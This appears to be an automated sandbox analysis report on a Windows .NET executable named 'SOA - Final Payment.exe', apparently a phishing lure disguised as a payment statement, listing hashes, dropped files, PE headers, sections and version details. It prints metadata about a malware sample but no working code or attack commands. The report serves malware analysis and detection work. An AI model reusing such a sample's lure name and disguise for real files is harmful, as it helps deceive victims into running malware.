SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\secinit.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1221538113908904
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8ESRR9crV+J3mLxAXd:r2qOB1nxCkvSAELyKOMq+8ETZKoxAX
MD5: C1AE02DC8BFF5DD65491BF71C0B740A7
SHA1: 6B68C7B76FB3D1F36D6CF003C60B1571C62C0E0F
SHA-256: CF2E96737B5DDC980E0F71003E391399AAE5124C091C254E4CCCBC2A370757D7
SHA-512: 01F8CA51310726726B0B936385C869CDDBC9DD996B488E539B72C580BD394219774C435482E618D58EB8F08D411411B63912105E4047CB29F845B2D07DE3E0E1
Malicious: false
Reputation: moderate, very likely benign file
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.767473361742161
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: SOA - Final Payment.exe
File size: 782'336 bytes
MD5: 070cf235938777838e7c55c9f0c02993
SHA1: e32f0362867403655ca9ba219b40d453fd9ad096
SHA256: 004d0b8aa2bc2236e124fceddc2ef21c091678fc622d6bce5ed02292b0b971e4
SHA512: 2e2200abf652e3b0a8fa477322414192c54a203cedc35a3bc6d171eb680b2179ef66d4a92ce40fee54ce12448ebfd5e8fc472c5bc38a73896023afbf9196327c
SSDEEP: 12288:TRIAbZWUBjuxfrUxcbETuRF9VUqEnEqug+A6Fi3zzeeUsKk5imCXyCbg:THbYUwxfrUxpsFMdE4+A6Fi3mePKk5i9
TLSH: A3F4F1C43B26A706DD691B309A35EDF567B81DACB000B8E25ECE3B57B9AC2115D1CF42
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q.g..............0.................. ........@.. .......................@............@................................
Icon Hash: bfdbd0a493925a25
Entrypoint: 0x4bf0ba
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67A971A5 [Mon Feb 10 03:25:25 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add dword ptr [eax], eax
                                            add byte ptr [eax], al
                                            add al, byte ptr [eax]
                                            add byte ptr [eax], al
                                            add eax, dword ptr [eax]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xbf068 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc0000 | 0x1864 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xbd0d0 | 0xbd200 | bcca7b8fbc007864ddf0cee3656f259e | False | 0.9127148050231328 | data | 7.772646253601764 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc0000 | 0x1864 | 0x1a00 | 367c6a73ebe488b38ab65ecc8448e282 | False | 0.8149038461538461 | data | 7.2017839336384375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xc2000 | 0xc | 0x200 | 9de687ebda200d0300c368ba0f4eb73f | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc00c8 | 0x1468 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9529096477794793
RT_GROUP_ICON | 0xc1540 | 0x14 | data | | | 1.05
RT_VERSION | 0xc1564 | 0x2fc | data | | | 0.4397905759162304
DLL | Import
mscoree.dll | _CorExeMain
Description | Data
Translation | 0x0000 0x04b0
Comments |
CompanyName |
FileDescription | MultipleForms
FileVersion | 3.0.0.0
InternalName | gRvW.exe
LegalCopyright |
LegalTrademarks |
OriginalFilename | gRvW.exe
ProductName | MultipleForms
ProductVersion | 3.0.0.0
Assembly Version | 4.0.0.0